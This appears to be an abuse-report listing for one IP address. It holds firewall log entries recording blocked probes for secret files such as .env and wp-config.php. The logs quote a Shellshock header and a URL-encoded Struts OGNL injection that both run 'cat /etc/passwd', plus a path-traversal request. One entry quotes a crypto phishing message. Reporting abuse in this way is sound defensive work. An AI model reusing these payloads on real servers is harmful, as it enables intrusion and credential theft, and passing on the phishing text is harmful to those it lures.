๐บ๐ธ
TPI-Abuse
2026-01-27 03:20:31
(4 months ago)
(mod_security) mod_security (id:210730) triggered by 207.244.217.69 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:210730) triggered by 207.244.217.69 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Jan 26 22:20:25.260024 2026] [security2:error] [pid 25623:tid 25628] [client 207.244.217.69:36211] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.kettlehill.kettlehill.com|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.kettlehill.kettlehill.com"] [uri "/CookieAuth.dll"] [unique_id "aXgu-UnFQpvwgxC6L2HuNAAAAYI"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-01-17 06:25:59
(4 months ago)
(mod_security) mod_security (id:210492) triggered by 207.244.217.69 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:210492) triggered by 207.244.217.69 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Jan 17 01:25:56.161349 2026] [security2:error] [pid 20103:tid 20103] [client 207.244.217.69:48343] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cpcalendars.nbcnewsradio.com"] [uri "/sftp-config.json"] [unique_id "aWsrdNRQc_naA3qxEHytpAAAAAc"]
show less
Brute-Force
Bad Web Bot
Web App Attack
Anonymous
2025-11-14 03:37:00
(6 months ago)
Ports: 2077,2078,2082,2083,2086,2087,2095,2096; Direction: 0; Trigger: LF_DISTATTACK
Brute-Force
SSH
๐บ๐ธ
TPI-Abuse
2025-11-13 08:59:09
(6 months ago)
(mod_security) mod_security (id:210492) triggered by 207.244.217.69 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:210492) triggered by 207.244.217.69 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Nov 13 03:58:02.322424 2025] [security2:error] [pid 1575:tid 1575] [client 207.244.217.69:48569] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "ftp.nbcnewsradio.com"] [uri "/wp-config.php.original"] [unique_id "aRWdmrRA3CeB8Eg5PqvKlQAAAAA"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-07-26 23:56:26
(10 months ago)
(mod_security) mod_security (id:221260) triggered by 207.244.217.69 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:221260) triggered by 207.244.217.69 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Jul 26 19:55:39.971108 2025] [security2:error] [pid 24712:tid 24872] [client 207.244.217.69:54549] ModSecurity: Access denied with code 403 (phase 1). Pattern match "^(?:\\\\'\\\\w+?=)?\\\\(\\\\)\\\\s{" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "77"] [id "221260"] [rev "3"] [msg "COMODO WAF: Shellshock Command Injection Vulnerabilities in GNU Bash through 4.3 bash43-026 (CVE-2014-7187, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271)||cpanel.kettlehill.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cpanel.kettlehill.com"] [uri "/cgi-bin/stats"] [unique_id "aIVq-7zNFJM38bDc9XmjCAAAARU"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
show less
Brute-Force
Bad Web Bot
Web App Attack
Anonymous
2025-06-23 14:12:11
(11 months ago)
Ports: 2077,2078,2082,2083,2086,2087,2095,2096; Direction: 0; Trigger: LF_DISTATTACK
Brute-Force
SSH
๐บ๐ธ
nowyouknow
2025-06-10 05:11:05
(11 months ago)
(From [email protected] ) who woke up lucky today? yeah u did
we got ur name from our list and u j ...
show more
(From [email protected] ) who woke up lucky today? yeah u did
we got ur name from our list and u just scored a $10k bonus. for real. just join here https://pepeto.io/
, Add $500 in ur account, msg support [email protected] w/ ur acc name โ and BOOM money. no weird stuff. just donโt forget to claim it.
check our socials:
https://www.instagram.com/pepetocoin/
https://x.com/Pepetocoin
https://www.youtube.com/@Pepetocoin
contact us on telegram to claim your reward - easy money ๏ฐ
https://t.me/pepeto_channel
show less
Phishing
Web Spam
๐ฉ๐ช
Alejandro Docasar
2024-11-27 21:31:19
(1 year ago)
Web App Attack
๐บ๐ธ
TPI-Abuse
2024-11-26 23:30:34
(1 year ago)
(mod_security) mod_security (id:240950) triggered by 207.244.217.69 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:240950) triggered by 207.244.217.69 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Nov 26 18:30:20.722710 2024] [security2:error] [pid 14716:tid 14977] [client 207.244.217.69:47363] [client 207.244.217.69] ModSecurity: Access denied with code 403 (phase 1). Pattern match "\\\\D" at TX:1. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/30_Apps_OtherApps.conf"] [line "4530"] [id "240950"] [rev "2"] [msg "COMODO WAF: XSS & SQL injection vulnerability in Pragyan CMS 3.0 (CVE-2015-1471)||webmail.kettlehill.net|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "webmail.kettlehill.net"] [uri "/_users/org.couchdb.user:poc"] [unique_id "Z0ZaDAhXN1-tm_FGp0dktQAAAMg"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ฉ๐ช
dayda.net
2024-11-22 04:05:11
(1 year ago)
name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_me ...
show more
name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D
show less
Bad Web Bot
๐บ๐ธ
TPI-Abuse
2024-09-01 01:55:36
(1 year ago)
(mod_security) mod_security (id:225170) triggered by 207.244.217.69 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:225170) triggered by 207.244.217.69 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Aug 31 21:52:16.162631 2024] [security2:error] [pid 3087700:tid 3087730] [client 207.244.217.69:60527] [client 207.244.217.69] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||kettlehill.net|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "kettlehill.net"] [uri "/wp-json/wp/v2/users/"] [unique_id "ZtPI0NyH84duF-C5mXVIaAAAAYA"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ฉ๐ช
ps-center
2024-07-15 19:13:56
(1 year ago)
SS1: Web Attack GET /../../etc/passwd
Web Spam
Hacking
Bad Web Bot
Web App Attack
๐ช๐ธ
10dencehispahard SL
2024-06-28 10:08:08
(1 year ago)
Unauthorized login attempts [ accesslogs]
Brute-Force
๐บ๐ธ
TPI-Abuse
2024-06-27 06:51:43
(1 year ago)
(mod_security) mod_security (id:210492) triggered by 207.244.217.69 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:210492) triggered by 207.244.217.69 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Jun 27 02:51:34.588006 2024] [security2:error] [pid 971:tid 47876669482752] [client 207.244.217.69:44397] [client 207.244.217.69] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "whm.staging.kettlehill.com"] [uri "/.env.prod.local"] [unique_id "Zn0L9jiVwaDvmIdiplX1CQAAAdE"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ช๐ธ
10dencehispahard SL
2024-05-08 07:00:43
(2 years ago)
Unauthorized login attempts []
Brute-Force